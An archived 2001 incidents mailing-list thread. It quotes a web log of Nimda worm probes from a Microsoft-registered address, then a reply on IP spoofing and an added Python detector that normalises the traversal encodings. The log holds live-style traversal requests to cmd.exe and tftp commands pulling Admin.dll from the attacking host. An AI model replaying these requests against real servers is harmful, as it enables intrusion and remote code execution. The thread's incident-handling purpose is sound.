Re: Microsoft's Early Xmas Present.

From: mcoleman (mcolemanat_private)
Date: Sat Dec 29 2001 - 23:05:43 PST


    Hi Jay,
    
         These logs you included appear to be logs from the web server itself,
    correct?  Or, are these logs from something else that formats them this way?
    
         If these are the actual web server logs, then my point might be
    somewhat moot, but it could be trivial to fake M$'s source IP address in a
    GET request to possibly trick your early bird software to give you and M$ a
    holiday assache.
    
         If these are logs from the web server itself, then the 3-way handshake
    must have happened and that is really hard to spoof source IP without
    predictable sequence numbers, maybe someone spoofing directly upstream from
    you?  If you don't have stateful protection on your firewall and your
    earlybird software just sniffs signatures off of the wire like Snort does,
    then someone could generate SYNed/ACKed packets (to get past Established
    Filters) containing Nimda GET requests using whatever source IP they wanted,
    and could maybe trick a "signature sniffing" reporting system, and your web
    server would just ignore them...?
    
        Then, there's always the possibility that M$ got infected, but you have
    to consider all angles.  Far be it from me to defend M$, but you have to keep
    an open mind about everything these days.  I don't believe anything unless
    it is proven.  Completion of a 3-way handshake would be strong evidence for
    me though.
    
         On a whim, I would consider looking up www.whitehouse.gov and see if
    the earlybird saw and reported attacks from that network as well, as this
    would likely be another target that a trickster would use to try to embarrass
    you.
    
         That early bird software is a great idea, but I see it easily abused
    unless strong precautions are in place.  I am sorry I am not familiar with
    that software, it may be much deeper than I am giving it credit for, I just
    thought it important to throw this possibility to you tonight in case that
    is what is happening.  Good luck.. please let us know the outcome of this.
    
    -Mark Coleman
    
    
    -----Original Message-----
    From: Jay D. Dyson <jdysonat_private>
    To: Incidents List <incidentsat_private>
    Date: Saturday, December 29, 2001 11:27 PM
    Subject: Microsoft's Early Xmas Present.
    
    
    >-----BEGIN PGP SIGNED MESSAGE-----
    >
    >Hi folks,
    >
    > Normally I wouldn't be sending this out, but I figure folks need
    >to be aware and wary, considering the origin of this intrusion attempt.
    >
    > I received an early Xmas present from Microsoft.  No, I didn't get
    >XP, nor did I get the latest Office software suite.
    >
    > I got a Nimda intrusion attempt.
    >
    > Early Bird[1] picked up on this intrusion attempt and immediately
    >notified Microsoft.  I've yet to hear back from Microsoft as to why this
    >attack from their network came to pass[2].
    >
    > For those who are interested, here's the log excerpt.
    >
    >208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:34:46 -0800] "GET /scripts/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 421 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:34:56 -0800] "GET /scripts/Admin.dll HTTP/1.0" 200 361 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:35:06 -0800] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 200 365 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:35:17 -0800] "GET /MSADC/root.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20Admin.dll HTTP/1.0" 200 419 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:35:27 -0800] "GET /MSADC/Admin.dll HTTP/1.0" 200 359 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:35:37 -0800] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:35:51 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:07 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:18 -0800] "GET /c/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:28 -0800] "GET /c/Admin.dll HTTP/1.0" 200 355 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:38 -0800] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 375 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:49 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:36:59 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:37:09 -0800] "GET /d/winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 432 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:37:23 -0800] "GET /d/Admin.dll HTTP/1.0" 200 355 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:37:39 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:38:10 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:38:24 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:38:35 -0800] "GET /scripts/..%255c../Admin.dll HTTP/1.0" 200 371 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:38:45 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:39:00 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:39:11 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:39:25 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:39:40 -0800] "GET /_vti_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:39:51 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 412 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:40:06 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:40:17 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:40:31 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 469 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:40:46 -0800] "GET /_mem_bin/..%255c../..%255c../..%255c../Admin.dll HTTP/1.0" 200 392 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:40:57 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 440 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:41:12 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:41:23 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:41:37 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 497 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:41:52 -0800] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../Admin.dll HTTP/1.0" 200 420 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:42:03 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:42:18 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:42:29 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:42:43 -0800] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:42:58 -0800] "GET /scripts/..%c1%1c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:19 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:29 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:40 -0800] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:43:50 -0800] "GET /scripts/..%c0%af../Admin.dll HTTP/1.0" 200 372 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:44:09 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 392 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:44:20 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:44:31 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:44:41 -0800] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 449 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:44:51 -0800] "GET /scripts/..%c1%9c../Admin.dll HTTP/1.0" 200 372 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:02 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 395 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:12 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:23 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:33 -0800] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 452 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:43 -0800] "GET /scripts/..%25%35%63../Admin.dll HTTP/1.0" 200 375 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:45:57 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 200 391 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:46:13 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:46:28 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20d:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:46:44 -0800] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20e:\Admin.dll HTTP/1.0" 200 448 "-" "-"
    >208.229.100.126 - - [24/Dec/2001:19:46:58 -0800] "GET /scripts/..%252f../Admin.dll HTTP/1.0" 200 371 "-" "-"
    >
    >$ whois -h whois.arin.net 208.229.100.126
    >
    >Microsoft Labs (NETBLK-UU-208-229-100-D1)
    >   One Microsoft Way
    >   Redmond, WA 98052
    >   US
    >
    >   Netname: UU-208-229-100-D1
    >   Netblock: 208.229.100.0 - 208.229.101.255
    >
    >   Coordinator:
    >      Steig, Rick  (RS8676-ARIN)  a-rickstat_private
    >      (425) 703-3061
    >
    >   Record last updated on 03-Nov-1997.
    >   Database last updated on  27-Dec-2001 19:55:32 EDT.
    >
    >- -Jay
    >
    >1. http://www.treachery.net/earlybird/
    >2. If anyone from Microsoft is reading this, I'd appreciate something
    > more pleasant next holiday season.  (FYI, the machine you hit ran
    > XP for only 15 seconds.  It now runs Linux.)
    >
    >   (    (                                                        _______
    >   ))   ))   .-"There's always time for a good cup of coffee"-.   >====<--.
    > C|~~|C|~~| (>----- Jay D. Dyson -- jdysonat_private -----<) |    = |-'
    >  `--' `--'  `---------- Si vis pacem, para bellum. ----------'  `------'
    >
    >
    >
    >----------------------------------------------------------------------------
    >This list is provided by the SecurityFocus ARIS analyzer service.
    >For more information on this free incident handling, management
    >and tracking system please see: http://aris.securityfocus.com
    
    
    
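Reading the quoted log the way the reply suggests, as an added example that is not part of either post: the Python below parses Apache-style lines, folds the encodings the probes use (%255c, %c1%1c, %c0%af, %%35%63 and the rest) to one canonical path so a single pattern covers every variant, and tallies per source address how many probes the server actually answered, since a server-side entry with a status code implies a completed handshake while a sniffer alert does not. The four probe lines are copied from the log above; the 10.0.0.5 request is a constructed benign line.

```python
import re
from urllib.parse import unquote_to_bytes

# One Apache access-log line in the layout quoted in the thread: src, ident, user, [time], "req", status, size.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) (\S+)')
# Request fragments that mark the Nimda probes in the quoted log.
INDICATORS = (b"root.exe", b"cmd.exe", b"admin.dll", b"tftp")
# Overlong UTF-8 forms of "/" and "\" used in the log (%c0%af, %c0%2f, %c1%1c, %c1%9c).
OVERLONG = {b"\xc0\xaf": b"/", b"\xc0\x2f": b"/", b"\xc1\x1c": b"\\", b"\xc1\x9c": b"\\"}

def normalise(path: str) -> bytes:
    """Percent-decode twice (%255c -> %5c -> \\), fold overlong UTF-8, unify slashes and case."""
    twice = unquote_to_bytes(unquote_to_bytes(path))  # bytes in, bytes out: no UTF-8 re-encoding
    for bad, good in OVERLONG.items():
        twice = twice.replace(bad, good)
    return twice.replace(b"\\", b"/").lower()

def classify(line: str):
    """Parse one log line into source, time, status, canonical path and the indicators it hits."""
    m = LOG_RE.match(line)
    if not m:
        return None
    src, when, _method, path, status, _size = m.groups()
    canon = normalise(path)
    hits = [i.decode() for i in INDICATORS if i in canon] + (["traversal"] if b"../" in canon else [])
    return {"src": src, "time": when, "status": int(status), "path": canon.decode(), "hits": hits}

def summarise(log_text: str) -> dict:
    """Per source IP: probe count, probes the server answered 200, first/last time, indicators.
    A server log entry with a status code means the handshake completed; a sniffer alert does not."""
    out = {}
    for rec in filter(None, map(classify, log_text.splitlines())):
        if not rec["hits"]:
            continue
        s = out.setdefault(rec["src"], {"probes": 0, "served": 0, "first": rec["time"], "last": None, "hits": set()})
        s["probes"] += 1
        s["served"] += rec["status"] == 200
        s["last"] = rec["time"]
        s["hits"].update(rec["hits"])
    return out

# Constructed sample: four lines copied from the quoted log plus one benign request from a made-up address.
SAMPLE_LOG = r"""208.229.100.126 - - [24/Dec/2001:19:34:36 -0800] "GET /scripts/root.exe?/c+dir HTTP/1.0" 200 367 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:37:54 -0800] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+tftp%20-i%20208.229.100.126%20GET%20Admin.dll%20c:\Admin.dll HTTP/1.0" 200 448 "-" "-"
208.229.100.126 - - [24/Dec/2001:19:43:09 -0800] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 - "-" "-"
208.229.100.126 - - [24/Dec/2001:19:45:01 -0800] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 353 "-" "-"
10.0.0.5 - - [24/Dec/2001:19:50:00 -0800] "GET /index.html HTTP/1.0" 200 1234 "-" "-"
"""
print(summarise(SAMPLE_LOG))  # one entry for 208.229.100.126: 4 probes, 2 answered with 200
```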



    This archive was generated by hypermail 2b30 : Sun Dec 30 2001 - 16:43:03 PST